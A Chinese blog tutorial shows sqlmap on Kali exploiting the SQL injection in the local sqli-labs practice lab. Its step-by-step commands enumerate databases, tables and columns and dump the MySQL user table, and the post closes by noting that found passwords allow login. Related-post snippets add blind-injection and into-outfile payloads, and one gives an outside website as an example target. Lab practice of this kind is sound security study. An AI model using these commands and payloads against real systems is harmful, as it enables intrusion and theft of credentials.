kali mysql注入_利用kali自带的sqlmap注入sqli-labs-master

最新推荐文章于 2024-04-18 10:26:33 发布
最新推荐文章于 2024-04-18 10:26:33 发布
阅读量430 收藏
点赞数
文章标签: kali mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42552261/article/details/113394048
版权
本文介绍了如何利用sqlmap工具对sqli-labs-master的GET型SQL注入漏洞进行爆破,包括检测目标版本、数据库、表及字段,最终获取数据。
摘要由CSDN通过智能技术生成

sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。

GET型的sqlmap爆破。

1、检测目标的版本

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1

效果图如下:

646070886581925d1502411c241c69ad.png

2、检测目标的数据库

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --dbs

效果图如下:

35ab9d09c3f46410b1b809c9197085fe.png

3、检测目标数据库中的表(batch的意思是不用一直yes,直接运行到底)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --tables -D mysql --batch

效果图如下:

68d7b83e2b55e5ff4c76c538ed6cff48.png

4、检测表里有哪些字段(–column列出字段 ,-T后面+表名,-D后面+数据库名)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 --column -T user -D mysql --batch

效果图如下:

a4adffbc82cef431dcb003c2cdd4a848.png

5、这时可以看看字段里有什么数据(-C查看字段,–dump是把所有的记录列出来)

sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1 -C User -T user -D mysql --batch --dump

效果图如下:

0a00d972697a8468788202cf43714da4.png

这样我们就可以找到包含密码的数据库,然后进行登录了

维斯特的萨克斯
关注
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
kali mysql注入_在windows系统和kali中通过sqlmap注入
weixin_33526828的博客
01-27 660
第1章 在windows系统中通过sqlmap注入1.1 环境搭建Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux,由于sqlmap是基于Python编写,所以需要在系统中先安装好2.7.x版本的Python,然后将下载好的sqlmap放在Python2.7目录下,这里Python安装我就不一一截图了,因为都是使用默认安装,只是安装的时候根据需要可...
kali使用mysql注入攻击_kalisql注入
weixin_30588381的博客
01-18 1700
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
kali之使用sqlmap进行sql注入
xv66666的博客
07-26 898
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入
sqlmapSQLi-LABS靶场 1-10关
小明师傅博客
06-04 8202
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqli--labs 注入sqli-labs-less1~4),与sqlmap的使用
m0_51607644的博客
01-20 531
SQLlabs注入 sqlmap工具注入
sqli-labs-master第八关
FourthGuy的博客
10-09 1649
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
sqlmap的使用_sqlmap --force-ssl(2),2024年最新2024大厂网络安全知识点总结
最新发布
2301_76225520的博客
04-18 455
sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。-d: 直接连接数据库 (-d “mysql://user:passward@地址:端口/数据库名称”)3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
2020.4.3 sqli-labs--第八、九、十关②
DSR446的博客
04-04 497
方法一:看是否有file权限,利用into outfile 1.?id=2’ --+ 页面回显正常,不赘述了,这里是单引号字符型注入 2.页面没有显示位,没有数据库报错信息。 我们先尝试一下是否有file权限(先判断字段数) 3.当输入3时返回正常,输入4时不返回。 http://127.0.0.1/sqli-labs/Less-8/?id=1' union select 1,"<?php...
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1908
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
kalisql注入
03-19 679
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
kali-sqlMap使用技巧
HKkkkkSky的博客
09-20 771
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
SQL注入-基础步骤(先判断好相关信息,然后使用Kalisqlmap进行注入
weixin_47696216的博客
11-24 2062
SQL注入基础
Kali Linux学习笔记—SQLMAP 自动注入
weixin_43653897的博客
12-23 1992
SQLMAP 自动注入概述简介五种漏洞检测技术其他特性安装实验环境Target 概述 简介 开源 sql 注入漏洞检测、利用工具 检测动态页面中get/post参数、cookie、http头 数据榨取 文件系统访问 操作系统命令执行 引擎强大、特性丰富 Xss漏洞检测 五种漏洞检测技术 基于布尔的盲注检测 基于时间的盲注检测 ' and (select * from(select(sleep(20)))a)--+ 判断服务器执行时间长短 基于错误的检测 基于UNION联合查询的检测 适用于通
kali使用mysql注入攻击_基于kali实现的一些攻击
weixin_39653320的博客
01-25 1756
本文如果出现什么错误,或者有什么建议欢迎随时联系我,谢谢!1、局域网断网攻击-----ARP攻击(使用kali下的arpspoof工具,为了方便,受害主机为本人主机)(1)Windows下查询本机IP地址、默认网关:Cmd下ipconfig(2)查找局域网中的IP地址:fping -asg 10.22.116.0/241(3)arpspoof -i 本机网卡(eth0) -t 目标IP地址 网关模...
Kali Linux渗透测试 093 自动注入-Sqlmap
kevinhanser
09-17 7881
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. Sqlmap 简介 2. Target 3. Requests 4.Optization(优化) 5. injection 6. detection 7. techniques 8. fingerprint(指纹
kali渗透测试与教学笔记3:sql注入
lm19770429的专栏
04-20 478
web应用渗透测试技术: sqlmap
新版KALI 部署 sql-labs-master (sql注入靶场)
weixin_42819368的博客
03-08 1860
kali 上部署sql-labs : sql-labs 需要部署在 mysql+php+apache 的环境下 kali自带 mysql+php+apache 首先需要 启用mysql 与 apache服务 初始化mysql mysql_secure_installation 初始化 密码 及开启远程连接 下载 sql-labs https://github.com/Audi-1/sq...
怎么再kali Linux配置sqli-labs靶场
05-31
Kali Linux 中配置 sqli-labs 靶场,需要进行以下步骤: 1. 安装 LAMP 环境 sqli-labs 是一个基于 PHP 和 MySQL 的 web 应用程序,因此需要先安装 LAMP 环境。可以使用以下命令安装: ``` sudo apt-get update...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值